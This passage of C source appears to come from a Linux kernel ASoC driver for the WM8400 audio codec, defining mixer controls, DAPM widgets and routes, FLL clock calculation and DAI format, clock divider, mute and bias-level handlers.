wm8400_ainrmux_enum); /* RXVOICE */ static const struct snd_kcontrol_new wm8400_dapm_rxvoice_controls[] = { SOC_DAPM_SINGLE_TLV("LIN4/RXN", WM8400_INPUT_MIXER5, WM8400_LR4BVOL_SHIFT, WM8400_LR4BVOL_MASK, 0, in_mix_tlv), SOC_DAPM_SINGLE_TLV("RIN4/RXP", WM8400_INPUT_MIXER6, WM8400_RL4BVOL_SHIFT, WM8400_RL4BVOL_MASK, 0, in_mix_tlv), }; /* LOMIX */ static const struct snd_kcontrol_new wm8400_dapm_lomix_controls[] = { SOC_DAPM_SINGLE("LOMIX Right 
ADC Bypass Switch", WM8400_OUTPUT_MIXER1, WM8400_LRBLO_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOMIX Left ADC Bypass Switch", WM8400_OUTPUT_MIXER1, WM8400_LLBLO_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOMIX RIN3 Bypass Switch", WM8400_OUTPUT_MIXER1, WM8400_LRI3LO_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOMIX LIN3 Bypass Switch", WM8400_OUTPUT_MIXER1, WM8400_LLI3LO_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOMIX RIN12 PGA Bypass Switch", WM8400_OUTPUT_MIXER1, WM8400_LR12LO_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOMIX LIN12 PGA Bypass Switch", WM8400_OUTPUT_MIXER1, WM8400_LL12LO_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOMIX Left DAC Switch", WM8400_OUTPUT_MIXER1, WM8400_LDLO_SHIFT, 1, 0), }; /* ROMIX */ static const struct snd_kcontrol_new wm8400_dapm_romix_controls[] = { SOC_DAPM_SINGLE("ROMIX Left ADC Bypass Switch", WM8400_OUTPUT_MIXER2, WM8400_RLBRO_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROMIX Right ADC Bypass Switch", WM8400_OUTPUT_MIXER2, WM8400_RRBRO_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROMIX LIN3 Bypass Switch", WM8400_OUTPUT_MIXER2, WM8400_RLI3RO_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROMIX RIN3 Bypass Switch", WM8400_OUTPUT_MIXER2, WM8400_RRI3RO_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROMIX LIN12 PGA Bypass Switch", WM8400_OUTPUT_MIXER2, WM8400_RL12RO_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROMIX RIN12 PGA Bypass Switch", WM8400_OUTPUT_MIXER2, WM8400_RR12RO_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROMIX Right DAC Switch", WM8400_OUTPUT_MIXER2, WM8400_RDRO_SHIFT, 1, 0), }; /* LONMIX */ static const struct snd_kcontrol_new wm8400_dapm_lonmix_controls[] = { SOC_DAPM_SINGLE("LONMIX Left Mixer PGA Switch", WM8400_LINE_MIXER1, WM8400_LLOPGALON_SHIFT, 1, 0), SOC_DAPM_SINGLE("LONMIX Right Mixer PGA Switch", WM8400_LINE_MIXER1, WM8400_LROPGALON_SHIFT, 1, 0), SOC_DAPM_SINGLE("LONMIX Inverted LOP Switch", WM8400_LINE_MIXER1, WM8400_LOPLON_SHIFT, 1, 0), }; /* LOPMIX */ static const struct snd_kcontrol_new wm8400_dapm_lopmix_controls[] = { SOC_DAPM_SINGLE("LOPMIX Right Mic Bypass Switch", WM8400_LINE_MIXER1, WM8400_LR12LOP_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOPMIX Left Mic 
Bypass Switch", WM8400_LINE_MIXER1, WM8400_LL12LOP_SHIFT, 1, 0), SOC_DAPM_SINGLE("LOPMIX Left Mixer PGA Switch", WM8400_LINE_MIXER1, WM8400_LLOPGALOP_SHIFT, 1, 0), }; /* RONMIX */ static const struct snd_kcontrol_new wm8400_dapm_ronmix_controls[] = { SOC_DAPM_SINGLE("RONMIX Right Mixer PGA Switch", WM8400_LINE_MIXER2, WM8400_RROPGARON_SHIFT, 1, 0), SOC_DAPM_SINGLE("RONMIX Left Mixer PGA Switch", WM8400_LINE_MIXER2, WM8400_RLOPGARON_SHIFT, 1, 0), SOC_DAPM_SINGLE("RONMIX Inverted ROP Switch", WM8400_LINE_MIXER2, WM8400_ROPRON_SHIFT, 1, 0), }; /* ROPMIX */ static const struct snd_kcontrol_new wm8400_dapm_ropmix_controls[] = { SOC_DAPM_SINGLE("ROPMIX Left Mic Bypass Switch", WM8400_LINE_MIXER2, WM8400_RL12ROP_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROPMIX Right Mic Bypass Switch", WM8400_LINE_MIXER2, WM8400_RR12ROP_SHIFT, 1, 0), SOC_DAPM_SINGLE("ROPMIX Right Mixer PGA Switch", WM8400_LINE_MIXER2, WM8400_RROPGAROP_SHIFT, 1, 0), }; /* OUT3MIX */ static const struct snd_kcontrol_new wm8400_dapm_out3mix_controls[] = { SOC_DAPM_SINGLE("OUT3MIX LIN4/RXP Bypass Switch", WM8400_OUT3_4_MIXER, WM8400_LI4O3_SHIFT, 1, 0), SOC_DAPM_SINGLE("OUT3MIX Left Out PGA Switch", WM8400_OUT3_4_MIXER, WM8400_LPGAO3_SHIFT, 1, 0), }; /* OUT4MIX */ static const struct snd_kcontrol_new wm8400_dapm_out4mix_controls[] = { SOC_DAPM_SINGLE("OUT4MIX Right Out PGA Switch", WM8400_OUT3_4_MIXER, WM8400_RPGAO4_SHIFT, 1, 0), SOC_DAPM_SINGLE("OUT4MIX RIN4/RXP Bypass Switch", WM8400_OUT3_4_MIXER, WM8400_RI4O4_SHIFT, 1, 0), }; /* SPKMIX */ static const struct snd_kcontrol_new wm8400_dapm_spkmix_controls[] = { SOC_DAPM_SINGLE("SPKMIX LIN2 Bypass Switch", WM8400_SPEAKER_MIXER, WM8400_LI2SPK_SHIFT, 1, 0), SOC_DAPM_SINGLE("SPKMIX LADC Bypass Switch", WM8400_SPEAKER_MIXER, WM8400_LB2SPK_SHIFT, 1, 0), SOC_DAPM_SINGLE("SPKMIX Left Mixer PGA Switch", WM8400_SPEAKER_MIXER, WM8400_LOPGASPK_SHIFT, 1, 0), SOC_DAPM_SINGLE("SPKMIX Left DAC Switch", WM8400_SPEAKER_MIXER, WM8400_LDSPK_SHIFT, 1, 0), SOC_DAPM_SINGLE("SPKMIX Right DAC 
Switch", WM8400_SPEAKER_MIXER, WM8400_RDSPK_SHIFT, 1, 0), SOC_DAPM_SINGLE("SPKMIX Right Mixer PGA Switch", WM8400_SPEAKER_MIXER, WM8400_ROPGASPK_SHIFT, 1, 0), SOC_DAPM_SINGLE("SPKMIX RADC Bypass Switch", WM8400_SPEAKER_MIXER, WM8400_RL12ROP_SHIFT, 1, 0), SOC_DAPM_SINGLE("SPKMIX RIN2 Bypass Switch", WM8400_SPEAKER_MIXER, WM8400_RI2SPK_SHIFT, 1, 0), }; static const struct snd_soc_dapm_widget wm8400_dapm_widgets[] = { /* Input Side */ /* Input Lines */ SND_SOC_DAPM_INPUT("LIN1"), SND_SOC_DAPM_INPUT("LIN2"), SND_SOC_DAPM_INPUT("LIN3"), SND_SOC_DAPM_INPUT("LIN4/RXN"), SND_SOC_DAPM_INPUT("RIN3"), SND_SOC_DAPM_INPUT("RIN4/RXP"), SND_SOC_DAPM_INPUT("RIN1"), SND_SOC_DAPM_INPUT("RIN2"), SND_SOC_DAPM_INPUT("Internal ADC Source"), /* DACs */ SND_SOC_DAPM_ADC("Left ADC", "Left Capture", WM8400_POWER_MANAGEMENT_2, WM8400_ADCL_ENA_SHIFT, 0), SND_SOC_DAPM_ADC("Right ADC", "Right Capture", WM8400_POWER_MANAGEMENT_2, WM8400_ADCR_ENA_SHIFT, 0), /* Input PGAs */ SND_SOC_DAPM_MIXER("LIN12 PGA", WM8400_POWER_MANAGEMENT_2, WM8400_LIN12_ENA_SHIFT, 0, &wm8400_dapm_lin12_pga_controls[0], ARRAY_SIZE(wm8400_dapm_lin12_pga_controls)), SND_SOC_DAPM_MIXER("LIN34 PGA", WM8400_POWER_MANAGEMENT_2, WM8400_LIN34_ENA_SHIFT, 0, &wm8400_dapm_lin34_pga_controls[0], ARRAY_SIZE(wm8400_dapm_lin34_pga_controls)), SND_SOC_DAPM_MIXER("RIN12 PGA", WM8400_POWER_MANAGEMENT_2, WM8400_RIN12_ENA_SHIFT, 0, &wm8400_dapm_rin12_pga_controls[0], ARRAY_SIZE(wm8400_dapm_rin12_pga_controls)), SND_SOC_DAPM_MIXER("RIN34 PGA", WM8400_POWER_MANAGEMENT_2, WM8400_RIN34_ENA_SHIFT, 0, &wm8400_dapm_rin34_pga_controls[0], ARRAY_SIZE(wm8400_dapm_rin34_pga_controls)), SND_SOC_DAPM_SUPPLY("INL", WM8400_POWER_MANAGEMENT_2, WM8400_AINL_ENA_SHIFT, 0, NULL, 0), SND_SOC_DAPM_SUPPLY("INR", WM8400_POWER_MANAGEMENT_2, WM8400_AINR_ENA_SHIFT, 0, NULL, 0), /* INMIXL */ SND_SOC_DAPM_MIXER("INMIXL", SND_SOC_NOPM, 0, 0, &wm8400_dapm_inmixl_controls[0], ARRAY_SIZE(wm8400_dapm_inmixl_controls)), /* AINLMUX */ SND_SOC_DAPM_MUX("AILNMUX", SND_SOC_NOPM, 
0, 0, &wm8400_dapm_ainlmux_controls), /* INMIXR */ SND_SOC_DAPM_MIXER("INMIXR", SND_SOC_NOPM, 0, 0, &wm8400_dapm_inmixr_controls[0], ARRAY_SIZE(wm8400_dapm_inmixr_controls)), /* AINRMUX */ SND_SOC_DAPM_MUX("AIRNMUX", SND_SOC_NOPM, 0, 0, &wm8400_dapm_ainrmux_controls), /* Output Side */ /* DACs */ SND_SOC_DAPM_DAC("Left DAC", "Left Playback", WM8400_POWER_MANAGEMENT_3, WM8400_DACL_ENA_SHIFT, 0), SND_SOC_DAPM_DAC("Right DAC", "Right Playback", WM8400_POWER_MANAGEMENT_3, WM8400_DACR_ENA_SHIFT, 0), /* LOMIX */ SND_SOC_DAPM_MIXER_E("LOMIX", WM8400_POWER_MANAGEMENT_3, WM8400_LOMIX_ENA_SHIFT, 0, &wm8400_dapm_lomix_controls[0], ARRAY_SIZE(wm8400_dapm_lomix_controls), outmixer_event, SND_SOC_DAPM_PRE_REG), /* LONMIX */ SND_SOC_DAPM_MIXER("LONMIX", WM8400_POWER_MANAGEMENT_3, WM8400_LON_ENA_SHIFT, 0, &wm8400_dapm_lonmix_controls[0], ARRAY_SIZE(wm8400_dapm_lonmix_controls)), /* LOPMIX */ SND_SOC_DAPM_MIXER("LOPMIX", WM8400_POWER_MANAGEMENT_3, WM8400_LOP_ENA_SHIFT, 0, &wm8400_dapm_lopmix_controls[0], ARRAY_SIZE(wm8400_dapm_lopmix_controls)), /* OUT3MIX */ SND_SOC_DAPM_MIXER("OUT3MIX", WM8400_POWER_MANAGEMENT_1, WM8400_OUT3_ENA_SHIFT, 0, &wm8400_dapm_out3mix_controls[0], ARRAY_SIZE(wm8400_dapm_out3mix_controls)), /* SPKMIX */ SND_SOC_DAPM_MIXER_E("SPKMIX", WM8400_POWER_MANAGEMENT_1, WM8400_SPK_ENA_SHIFT, 0, &wm8400_dapm_spkmix_controls[0], ARRAY_SIZE(wm8400_dapm_spkmix_controls), outmixer_event, SND_SOC_DAPM_PRE_REG), /* OUT4MIX */ SND_SOC_DAPM_MIXER("OUT4MIX", WM8400_POWER_MANAGEMENT_1, WM8400_OUT4_ENA_SHIFT, 0, &wm8400_dapm_out4mix_controls[0], ARRAY_SIZE(wm8400_dapm_out4mix_controls)), /* ROPMIX */ SND_SOC_DAPM_MIXER("ROPMIX", WM8400_POWER_MANAGEMENT_3, WM8400_ROP_ENA_SHIFT, 0, &wm8400_dapm_ropmix_controls[0], ARRAY_SIZE(wm8400_dapm_ropmix_controls)), /* RONMIX */ SND_SOC_DAPM_MIXER("RONMIX", WM8400_POWER_MANAGEMENT_3, WM8400_RON_ENA_SHIFT, 0, &wm8400_dapm_ronmix_controls[0], ARRAY_SIZE(wm8400_dapm_ronmix_controls)), /* ROMIX */ SND_SOC_DAPM_MIXER_E("ROMIX", 
WM8400_POWER_MANAGEMENT_3, WM8400_ROMIX_ENA_SHIFT, 0, &wm8400_dapm_romix_controls[0], ARRAY_SIZE(wm8400_dapm_romix_controls), outmixer_event, SND_SOC_DAPM_PRE_REG), /* LOUT PGA */ SND_SOC_DAPM_PGA("LOUT PGA", WM8400_POWER_MANAGEMENT_1, WM8400_LOUT_ENA_SHIFT, 0, NULL, 0), /* ROUT PGA */ SND_SOC_DAPM_PGA("ROUT PGA", WM8400_POWER_MANAGEMENT_1, WM8400_ROUT_ENA_SHIFT, 0, NULL, 0), /* LOPGA */ SND_SOC_DAPM_PGA("LOPGA", WM8400_POWER_MANAGEMENT_3, WM8400_LOPGA_ENA_SHIFT, 0, NULL, 0), /* ROPGA */ SND_SOC_DAPM_PGA("ROPGA", WM8400_POWER_MANAGEMENT_3, WM8400_ROPGA_ENA_SHIFT, 0, NULL, 0), /* MICBIAS */ SND_SOC_DAPM_SUPPLY("MICBIAS", WM8400_POWER_MANAGEMENT_1, WM8400_MIC1BIAS_ENA_SHIFT, 0, NULL, 0), SND_SOC_DAPM_OUTPUT("LON"), SND_SOC_DAPM_OUTPUT("LOP"), SND_SOC_DAPM_OUTPUT("OUT3"), SND_SOC_DAPM_OUTPUT("LOUT"), SND_SOC_DAPM_OUTPUT("SPKN"), SND_SOC_DAPM_OUTPUT("SPKP"), SND_SOC_DAPM_OUTPUT("ROUT"), SND_SOC_DAPM_OUTPUT("OUT4"), SND_SOC_DAPM_OUTPUT("ROP"), SND_SOC_DAPM_OUTPUT("RON"), SND_SOC_DAPM_OUTPUT("Internal DAC Sink"), }; static const struct snd_soc_dapm_route wm8400_dapm_routes[] = { /* Make DACs turn on when playing even if not mixed into any outputs */ {"Internal DAC Sink", NULL, "Left DAC"}, {"Internal DAC Sink", NULL, "Right DAC"}, /* Make ADCs turn on when recording * even if not mixed from any inputs */ {"Left ADC", NULL, "Internal ADC Source"}, {"Right ADC", NULL, "Internal ADC Source"}, /* Input Side */ /* LIN12 PGA */ {"LIN12 PGA", "LIN1 Switch", "LIN1"}, {"LIN12 PGA", "LIN2 Switch", "LIN2"}, /* LIN34 PGA */ {"LIN34 PGA", "LIN3 Switch", "LIN3"}, {"LIN34 PGA", "LIN4 Switch", "LIN4/RXN"}, /* INMIXL */ {"INMIXL", NULL, "INL"}, {"INMIXL", "Record Left Volume", "LOMIX"}, {"INMIXL", "LIN2 Volume", "LIN2"}, {"INMIXL", "LINPGA12 Switch", "LIN12 PGA"}, {"INMIXL", "LINPGA34 Switch", "LIN34 PGA"}, /* AILNMUX */ {"AILNMUX", NULL, "INL"}, {"AILNMUX", "INMIXL Mix", "INMIXL"}, {"AILNMUX", "DIFFINL Mix", "LIN12 PGA"}, {"AILNMUX", "DIFFINL Mix", "LIN34 PGA"}, {"AILNMUX", "RXVOICE 
Mix", "LIN4/RXN"}, {"AILNMUX", "RXVOICE Mix", "RIN4/RXP"}, /* ADC */ {"Left ADC", NULL, "AILNMUX"}, /* RIN12 PGA */ {"RIN12 PGA", "RIN1 Switch", "RIN1"}, {"RIN12 PGA", "RIN2 Switch", "RIN2"}, /* RIN34 PGA */ {"RIN34 PGA", "RIN3 Switch", "RIN3"}, {"RIN34 PGA", "RIN4 Switch", "RIN4/RXP"}, /* INMIXR */ {"INMIXR", NULL, "INR"}, {"INMIXR", "Record Right Volume", "ROMIX"}, {"INMIXR", "RIN2 Volume", "RIN2"}, {"INMIXR", "RINPGA12 Switch", "RIN12 PGA"}, {"INMIXR", "RINPGA34 Switch", "RIN34 PGA"}, /* AIRNMUX */ {"AIRNMUX", NULL, "INR"}, {"AIRNMUX", "INMIXR Mix", "INMIXR"}, {"AIRNMUX", "DIFFINR Mix", "RIN12 PGA"}, {"AIRNMUX", "DIFFINR Mix", "RIN34 PGA"}, {"AIRNMUX", "RXVOICE Mix", "LIN4/RXN"}, {"AIRNMUX", "RXVOICE Mix", "RIN4/RXP"}, /* ADC */ {"Right ADC", NULL, "AIRNMUX"}, /* LOMIX */ {"LOMIX", "LOMIX RIN3 Bypass Switch", "RIN3"}, {"LOMIX", "LOMIX LIN3 Bypass Switch", "LIN3"}, {"LOMIX", "LOMIX LIN12 PGA Bypass Switch", "LIN12 PGA"}, {"LOMIX", "LOMIX RIN12 PGA Bypass Switch", "RIN12 PGA"}, {"LOMIX", "LOMIX Right ADC Bypass Switch", "AIRNMUX"}, {"LOMIX", "LOMIX Left ADC Bypass Switch", "AILNMUX"}, {"LOMIX", "LOMIX Left DAC Switch", "Left DAC"}, /* ROMIX */ {"ROMIX", "ROMIX RIN3 Bypass Switch", "RIN3"}, {"ROMIX", "ROMIX LIN3 Bypass Switch", "LIN3"}, {"ROMIX", "ROMIX LIN12 PGA Bypass Switch", "LIN12 PGA"}, {"ROMIX", "ROMIX RIN12 PGA Bypass Switch", "RIN12 PGA"}, {"ROMIX", "ROMIX Right ADC Bypass Switch", "AIRNMUX"}, {"ROMIX", "ROMIX Left ADC Bypass Switch", "AILNMUX"}, {"ROMIX", "ROMIX Right DAC Switch", "Right DAC"}, /* SPKMIX */ {"SPKMIX", "SPKMIX LIN2 Bypass Switch", "LIN2"}, {"SPKMIX", "SPKMIX RIN2 Bypass Switch", "RIN2"}, {"SPKMIX", "SPKMIX LADC Bypass Switch", "AILNMUX"}, {"SPKMIX", "SPKMIX RADC Bypass Switch", "AIRNMUX"}, {"SPKMIX", "SPKMIX Left Mixer PGA Switch", "LOPGA"}, {"SPKMIX", "SPKMIX Right Mixer PGA Switch", "ROPGA"}, {"SPKMIX", "SPKMIX Right DAC Switch", "Right DAC"}, {"SPKMIX", "SPKMIX Left DAC Switch", "Right DAC"}, /* LONMIX */ {"LONMIX", "LONMIX Left Mixer 
PGA Switch", "LOPGA"}, {"LONMIX", "LONMIX Right Mixer PGA Switch", "ROPGA"}, {"LONMIX", "LONMIX Inverted LOP Switch", "LOPMIX"}, /* LOPMIX */ {"LOPMIX", "LOPMIX Right Mic Bypass Switch", "RIN12 PGA"}, {"LOPMIX", "LOPMIX Left Mic Bypass Switch", "LIN12 PGA"}, {"LOPMIX", "LOPMIX Left Mixer PGA Switch", "LOPGA"}, /* OUT3MIX */ {"OUT3MIX", "OUT3MIX LIN4/RXP Bypass Switch", "LIN4/RXN"}, {"OUT3MIX", "OUT3MIX Left Out PGA Switch", "LOPGA"}, /* OUT4MIX */ {"OUT4MIX", "OUT4MIX Right Out PGA Switch", "ROPGA"}, {"OUT4MIX", "OUT4MIX RIN4/RXP Bypass Switch", "RIN4/RXP"}, /* RONMIX */ {"RONMIX", "RONMIX Right Mixer PGA Switch", "ROPGA"}, {"RONMIX", "RONMIX Left Mixer PGA Switch", "LOPGA"}, {"RONMIX", "RONMIX Inverted ROP Switch", "ROPMIX"}, /* ROPMIX */ {"ROPMIX", "ROPMIX Left Mic Bypass Switch", "LIN12 PGA"}, {"ROPMIX", "ROPMIX Right Mic Bypass Switch", "RIN12 PGA"}, {"ROPMIX", "ROPMIX Right Mixer PGA Switch", "ROPGA"}, /* Out Mixer PGAs */ {"LOPGA", NULL, "LOMIX"}, {"ROPGA", NULL, "ROMIX"}, {"LOUT PGA", NULL, "LOMIX"}, {"ROUT PGA", NULL, "ROMIX"}, /* Output Pins */ {"LON", NULL, "LONMIX"}, {"LOP", NULL, "LOPMIX"}, {"OUT3", NULL, "OUT3MIX"}, {"LOUT", NULL, "LOUT PGA"}, {"SPKN", NULL, "SPKMIX"}, {"ROUT", NULL, "ROUT PGA"}, {"OUT4", NULL, "OUT4MIX"}, {"ROP", NULL, "ROPMIX"}, {"RON", NULL, "RONMIX"}, }; /* * Clock after FLL and dividers */ static int wm8400_set_dai_sysclk(struct snd_soc_dai *codec_dai, int clk_id, unsigned int freq, int dir) { struct snd_soc_codec *codec = codec_dai->codec; struct wm8400_priv *wm8400 = snd_soc_codec_get_drvdata(codec); wm8400->sysclk = freq; return 0; } struct fll_factors { u16 n; u16 k; u16 outdiv; u16 fratio; u16 freq_ref; }; #define FIXED_FLL_SIZE ((1 << 16) * 10) static int fll_factors(struct wm8400_priv *wm8400, struct fll_factors *factors, unsigned int Fref, unsigned int Fout) { u64 Kpart; unsigned int K, Nmod, target; factors->outdiv = 2; while (Fout * factors->outdiv < 90000000 || Fout * factors->outdiv > 100000000) { factors->outdiv *= 2; 
		/* Divider maxes out at 32; beyond that Fout is too low
		 * for the FLL to reach its operating band. */
		if (factors->outdiv > 32) {
			dev_err(wm8400->wm8400->dev,
				"Unsupported FLL output frequency %uHz\n",
				Fout);
			return -EINVAL;
		}
	}

	/* Internal FLL frequency the N.K multiplier must produce. */
	target = Fout * factors->outdiv;
	/* Convert the divider to its register encoding.
	 * NOTE(review): ">> 2" maps 2,4,8,16,32 -> 0,1,2,4,8 -- confirm
	 * this matches the WM8400 FLL_CONTROL_4 OUTDIV field encoding. */
	factors->outdiv = factors->outdiv >> 2;

	/* Low-reference-range bit for references below 48kHz. */
	if (Fref < 48000)
		factors->freq_ref = 1;
	else
		factors->freq_ref = 0;

	/* Starting FRATIO guess; the loop below steps it down (low Fref)
	 * or up (high Fref) into the valid 1..8 range. */
	if (Fref < 1000000)
		factors->fratio = 9;
	else
		factors->fratio = 0;

	/* Ensure we have a fractional part */
	do {
		if (Fref < 1000000)
			factors->fratio--;
		else
			factors->fratio++;

		if (factors->fratio < 1 || factors->fratio > 8) {
			dev_err(wm8400->wm8400->dev,
				"Unable to calculate FRATIO\n");
			return -EINVAL;
		}

		/* Integer multiplier N and the remainder that becomes
		 * the fractional part K. */
		factors->n = target / (Fref * factors->fratio);
		Nmod = target % (Fref * factors->fratio);
	} while (Nmod == 0);

	/* Calculate fractional part - scale up so we can round. */
	Kpart = FIXED_FLL_SIZE * (long long)Nmod;
	do_div(Kpart, (Fref * factors->fratio));
	K = Kpart & 0xFFFFFFFF;

	/* Round to nearest before the /10 below strips the scale. */
	if ((K % 10) >= 5)
		K += 5;

	/* Move down to proper range now rounding is done */
	factors->k = K / 10;

	dev_dbg(wm8400->wm8400->dev,
		"FLL: Fref=%u Fout=%u N=%x K=%x, FRATIO=%x OUTDIV=%x\n",
		Fref, Fout, factors->n, factors->k,
		factors->fratio, factors->outdiv);

	return 0;
}

/*
 * Configure the FLL to synthesize freq_out from freq_in.
 * freq_out == 0 requests that the FLL simply be switched off.
 */
static int wm8400_set_dai_pll(struct snd_soc_dai *codec_dai, int pll_id,
			      int source, unsigned int freq_in,
			      unsigned int freq_out)
{
	struct snd_soc_codec *codec = codec_dai->codec;
	struct wm8400_priv *wm8400 = snd_soc_codec_get_drvdata(codec);
	struct fll_factors factors;
	int ret;
	u16 reg;

	/* No-op if the FLL is already running at these rates. */
	if (freq_in == wm8400->fll_in && freq_out == wm8400->fll_out)
		return 0;

	if (freq_out) {
		ret = fll_factors(wm8400, &factors, freq_in, freq_out);
		if (ret != 0)
			return ret;
	} else {
		/* Bodge GCC 4.4.0 uninitialised variable warning - it
		 * doesn't seem capable of working out that we exit if
		 * freq_out is 0 before any of the uses.
		 */
		memset(&factors, 0, sizeof(factors));
	}

	wm8400->fll_out = freq_out;
	wm8400->fll_in = freq_in;

	/* We *must* disable the FLL before any changes */
	reg = snd_soc_read(codec, WM8400_POWER_MANAGEMENT_2);
	reg &= ~WM8400_FLL_ENA;
	snd_soc_write(codec, WM8400_POWER_MANAGEMENT_2, reg);

	reg = snd_soc_read(codec, WM8400_FLL_CONTROL_1);
	reg &= ~WM8400_FLL_OSC_ENA;
	snd_soc_write(codec, WM8400_FLL_CONTROL_1, reg);

	/* Caller only wanted the FLL disabled - done. */
	if (!freq_out)
		return 0;

	/* Reference range, fractional mode and FRATIO in CONTROL_1. */
	reg &= ~(WM8400_FLL_REF_FREQ | WM8400_FLL_FRATIO_MASK);
	reg |= WM8400_FLL_FRAC | factors.fratio;
	reg |= factors.freq_ref << WM8400_FLL_REF_FREQ_SHIFT;
	snd_soc_write(codec, WM8400_FLL_CONTROL_1, reg);

	/* Fractional (K) and integer (N) multiplier words. */
	snd_soc_write(codec, WM8400_FLL_CONTROL_2, factors.k);
	snd_soc_write(codec, WM8400_FLL_CONTROL_3, factors.n);

	/* Output divider in CONTROL_4. */
	reg = snd_soc_read(codec, WM8400_FLL_CONTROL_4);
	reg &= ~WM8400_FLL_OUTDIV_MASK;
	reg |= factors.outdiv;
	snd_soc_write(codec, WM8400_FLL_CONTROL_4, reg);

	return 0;
}

/*
 * Sets ADC and Voice DAC format.
 */
static int wm8400_set_dai_fmt(struct snd_soc_dai *codec_dai,
			      unsigned int fmt)
{
	struct snd_soc_codec *codec = codec_dai->codec;
	u16 audio1, audio3;

	audio1 = snd_soc_read(codec, WM8400_AUDIO_INTERFACE_1);
	audio3 = snd_soc_read(codec, WM8400_AUDIO_INTERFACE_3);

	/* set master/slave audio interface */
	switch (fmt & SND_SOC_DAIFMT_MASTER_MASK) {
	case SND_SOC_DAIFMT_CBS_CFS:
		audio3 &= ~WM8400_AIF_MSTR1;
		break;
	case SND_SOC_DAIFMT_CBM_CFM:
		audio3 |= WM8400_AIF_MSTR1;
		break;
	default:
		return -EINVAL;
	}

	audio1 &= ~WM8400_AIF_FMT_MASK;

	/* interface format */
	switch (fmt & SND_SOC_DAIFMT_FORMAT_MASK) {
	case SND_SOC_DAIFMT_I2S:
		audio1 |= WM8400_AIF_FMT_I2S;
		audio1 &= ~WM8400_AIF_LRCLK_INV;
		break;
	case SND_SOC_DAIFMT_RIGHT_J:
		audio1 |= WM8400_AIF_FMT_RIGHTJ;
		audio1 &= ~WM8400_AIF_LRCLK_INV;
		break;
	case SND_SOC_DAIFMT_LEFT_J:
		audio1 |= WM8400_AIF_FMT_LEFTJ;
		audio1 &= ~WM8400_AIF_LRCLK_INV;
		break;
	case SND_SOC_DAIFMT_DSP_A:
		audio1 |= WM8400_AIF_FMT_DSP;
		audio1 &= ~WM8400_AIF_LRCLK_INV;
		break;
	case SND_SOC_DAIFMT_DSP_B:
		/* DSP mode B = DSP format with inverted LRCLK. */
		audio1 |= WM8400_AIF_FMT_DSP |
			WM8400_AIF_LRCLK_INV;
		break;
	default:
		return -EINVAL;
	}

	snd_soc_write(codec, WM8400_AUDIO_INTERFACE_1, audio1);
	snd_soc_write(codec, WM8400_AUDIO_INTERFACE_3, audio3);
	return 0;
}

/*
 * Write a raw, pre-encoded divider value into the clocking register
 * field selected by div_id.  The caller supplies the register encoding
 * in 'div'; only the field is masked, the value is OR'd in as-is.
 */
static int wm8400_set_dai_clkdiv(struct snd_soc_dai *codec_dai,
				 int div_id, int div)
{
	struct snd_soc_codec *codec = codec_dai->codec;
	u16 reg;

	switch (div_id) {
	case WM8400_MCLK_DIV:
		reg = snd_soc_read(codec, WM8400_CLOCKING_2) &
			~WM8400_MCLK_DIV_MASK;
		snd_soc_write(codec, WM8400_CLOCKING_2, reg | div);
		break;
	case WM8400_DACCLK_DIV:
		reg = snd_soc_read(codec, WM8400_CLOCKING_2) &
			~WM8400_DAC_CLKDIV_MASK;
		snd_soc_write(codec, WM8400_CLOCKING_2, reg | div);
		break;
	case WM8400_ADCCLK_DIV:
		reg = snd_soc_read(codec, WM8400_CLOCKING_2) &
			~WM8400_ADC_CLKDIV_MASK;
		snd_soc_write(codec, WM8400_CLOCKING_2, reg | div);
		break;
	case WM8400_BCLK_DIV:
		reg = snd_soc_read(codec, WM8400_CLOCKING_1) &
			~WM8400_BCLK_DIV_MASK;
		snd_soc_write(codec, WM8400_CLOCKING_1, reg | div);
		break;
	default:
		return -EINVAL;
	}

	return 0;
}

/*
 * Set PCM DAI bit size and sample rate.
*/ static int wm8400_hw_params(struct snd_pcm_substream *substream, struct snd_pcm_hw_params *params, struct snd_soc_dai *dai) { struct snd_soc_codec *codec = dai->codec; u16 audio1 = snd_soc_read(codec, WM8400_AUDIO_INTERFACE_1); audio1 &= ~WM8400_AIF_WL_MASK; /* bit size */ switch (params_width(params)) { case 16: break; case 20: audio1 |= WM8400_AIF_WL_20BITS; break; case 24: audio1 |= WM8400_AIF_WL_24BITS; break; case 32: audio1 |= WM8400_AIF_WL_32BITS; break; } snd_soc_write(codec, WM8400_AUDIO_INTERFACE_1, audio1); return 0; } static int wm8400_mute(struct snd_soc_dai *dai, int mute) { struct snd_soc_codec *codec = dai->codec; u16 val = snd_soc_read(codec, WM8400_DAC_CTRL) & ~WM8400_DAC_MUTE; if (mute) snd_soc_write(codec, WM8400_DAC_CTRL, val | WM8400_DAC_MUTE); else snd_soc_write(codec, WM8400_DAC_CTRL, val); return 0; } /* TODO: set bias for best performance at standby */ static int wm8400_set_bias_level(struct snd_soc_codec *codec, enum snd_soc_bias_level level) { struct wm8400_priv *wm8400 = snd_soc_codec_get_drvdata(codec); u16 val; int ret; switch (level) { case SND_SOC_BIAS_ON: break; case SND_SOC_BIAS_PREPARE: /* VMID=2*50k */ val = snd_soc_read(codec, WM8400_POWER_MANAGEMENT_1) & ~WM8400_VMID_MODE_MASK; snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, val | 0x2); break; case SND_SOC_BIAS_STANDBY: if (codec->dapm.bias_level == SND_SOC_BIAS_OFF) { ret = regulator_bulk_enable(ARRAY_SIZE(power), &power[0]); if (ret != 0) { dev_err(wm8400->wm8400->dev, "Failed to enable regulators: %d\n", ret); return ret; } snd_soc_write(codec, WM8400_POWER_MANAGEMENT_1, WM8400_CODEC_ENA | WM8400_SYSCLK_ENA); /* Enable POBCTRL, SOFT_ST, VMIDTOG and BUFDCOPEN */ snd_soc_write(codec, WM8400_ANTIPOP2, WM8400_SOFTST | WM8400_BUFDCOPEN | WM8400_POBCTRL); msleep(50); /* Enable VREF & 